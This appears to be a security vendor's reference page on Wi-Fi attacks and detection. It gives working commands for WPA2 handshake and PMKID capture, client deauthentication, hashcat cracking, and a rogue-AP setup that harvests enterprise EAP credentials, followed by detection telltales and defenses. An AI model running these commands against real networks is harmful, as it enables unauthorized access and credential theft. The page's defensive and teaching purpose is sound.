New The 2026 Continuous Validation Methodology Paper is now available. Read the paper →
Reference · 4 Operational Technology & Embedded

Wi-Fi Attack & Detection.

Wireless attack surface across WPA2/WPA3 and enterprise EAP variants, with the practical detection telltales for each technique.

WPA2-PSK — handshake capture and crack

  1. Monitor mode. airmon-ng check kill && airmon-ng start wlan0. Stops NetworkManager from kicking the interface.
  2. Recon. airodump-ng wlan0mon. Note BSSID, channel, connected clients.
  3. Targeted capture. airodump-ng -c CH --bssid BSSID -w cap wlan0mon. Wait for handshake (organic) or deauth one client: aireplay-ng --deauth 5 -a BSSID -c CLIENT wlan0mon.
  4. PMKID fallback. hcxdumptool -i wlan0mon -o cap.pcapng --enable_status=1. Single-frame capture, no clients needed if AP supports PMKID.
  5. Convert. hcxpcapngtool -o hash.hc22000 cap.pcapng.
  6. Crack — wordlist + rule. hashcat -m 22000 hash.hc22000 rockyou.txt -r OneRuleToRuleThemAll.rule -O.
  7. Crack — mask. If you know the SSID convention has a phone number suffix: hashcat -m 22000 hash.hc22000 -a 3 SSID?d?d?d?d?d?d?d.

WPA3 / SAE

  • Different shape. SAE = Simultaneous Authentication of Equals. No four-way handshake to capture; offline brute is not the path.
  • Dragonblood downgrade. Forced WPA2 fallback in transition mode (mixed WPA2/WPA3) → capture WPA2 handshake, crack as usual.
  • Side-channel. Original Dragonblood timing side-channel patched in modern hostapd, but configuration-error variants still seen in legacy embedded.
  • Defense. WPA3-only mode (no transition). hostapd ≥ 2.10. Don't run WPA3 on hardware that lacks the side-channel fixes.

Enterprise — EAP variants

  • PEAP-MSCHAPv2 (most common, weakest). Client sees server cert, validates if configured. Misconfigured client (no CA pin, "Trust Any Cert" checked) → rogue-AP captures challenge/response → offline brute the NTLM hash.
  • EAP-TTLS-PAP. Plaintext password inside TLS tunnel. Same rogue-AP attack → plaintext credentials directly.
  • EAP-TLS. Mutual cert auth. No password to capture. Operational cost: PKI infrastructure, cert lifecycle. Hardest to break, easiest to operate badly.
  • Rogue-AP toolchain. eaphammer -i wlan0mon --essid CORP --auth wpa-eap --creds stands up rogue with same SSID + cert. Client roams.

Detection telltales for the blue team

  • Deauth frames. Floods of management-frame deauths from non-AP MACs. Wireless IDS (Aruba, Cisco WIPS) detects.
  • Rogue AP with same SSID. Signal-strength anomaly: known APs at known floors, sudden new AP with same SSID at unexpected location/signal.
  • EAP from unexpected supplicants. RADIUS logs show EAP attempts from unknown calling-station-ID (MAC).
  • PMKID requests. hcxdumptool-style PMKID probes leave a recognizable pattern on AP logs if AP exports them.

Defense — what actually works

  • PSK ≥ 20 random chars. Otherwise the rockyou+rules pass cracks it.
  • WPA3-only. Drop WPA2 if your client fleet supports it.
  • EAP-TLS or PEAP with strict client validation. Lock the cert pin; reject any cert not from your CA. Test the lock by standing up a rogue with self-signed cert and confirming clients refuse.
  • MFP (Management Frame Protection). Defeats deauth attacks. 802.11w; default in WPA3, optional in WPA2.
  • Wireless IDS deployed and tuned. Untuned WIDS is a checkbox; tuned WIDS catches rogue-AP and deauth floods.
Rule of thumbMost wireless wins still come from misconfigured WPA2-Enterprise clients ("Trust Any Cert" toggled on for convenience), not from cryptographic weaknesses. Audit the client-side trust configuration, not just the AP-side protocol.

Related notes in this domain

From reference to evidence

Run this against your own environment.